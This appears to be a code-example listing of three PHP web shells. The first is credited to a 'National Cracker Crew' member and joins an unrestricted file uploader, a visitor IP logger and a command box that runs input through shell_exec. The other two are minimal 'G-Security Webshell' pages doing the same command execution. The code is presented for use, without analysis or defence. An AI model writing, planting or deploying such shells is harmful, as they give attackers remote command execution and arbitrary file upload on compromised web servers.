Exemplo n.º 1
0
<?php 
if (isset($_FILES['probe']) and !$_FILES['probe']['error']) {
    // Alternativ:            and   $_FILES['probe']['size']
    move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
    printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n", $_FILES['probe']['name']);
    printf("Sie ist %u Bytes groß und vom Typ %s.<br />\n", $_FILES['probe']['size'], $_FILES['probe']['type']);
}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>IpLogger</h2>
<?php 
echo "<b><font color=red><br>IP: </font></b>";
echo $_SERVER['REMOTE_ADDR'];
echo "<b><font color=red><br>PORT: </font></b>";
echo $_SERVER['REMOTE_PORT'];
echo "<b><font color=red><br>BROWSER: </font></b>";
echo $_SERVER[HTTP_REFERER];
echo "<b><font color=red><br>REFERER: </font></b>";
echo $_SERVER['HTTP_USER_AGENT'];
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>Directory Lister</h2>
<? $cmd = $_REQUEST["-cmd"];?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?php 
echo $cmd;
?>
><hr><pre><?if($cmd != "") print Shell_Exec($cmd);?></pre></form><br>
<h1>---------------------------------------------------------------------------</h1><br>
<b>--Coded by Silver©--<br>
~|_Team .:National Cracker Crew:._|~<br>
<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>
Exemplo n.º 2
0
<html>
<head>
<title>G-Security Webshell</title>
</head>

<body bgcolor=#000000 text=#ffffff ">
<form method=POST>
<br>
<input type=TEXT name="-cmd" size=64 value="<?php 
echo $cmd;
?>
" 
style="background:#000000;color:#ffffff;">
<hr>
<pre>
<?php 
$cmd = $_REQUEST["-cmd"];
if ($cmd != "") {
    print Shell_Exec($cmd);
}
?>
</pre>
</form>
</body>
</html
Exemplo n.º 3
0
<html>
<head>
<title>G-Security Webshell</title>
</head>

<body bgcolor=#000000 text=#ffffff ">
<form method=POST>
<br>
<input type=TEXT name="-cmd" size=64 value="<?php 
echo $cmd;
?>
" 
style="background:#000000;color:#ffffff;">
<hr>
<pre>
<? $cmd = $_REQUEST["-cmd"];?>
<? if($cmd != "") print Shell_Exec($cmd);?>
</pre>
</form>
</body>
</html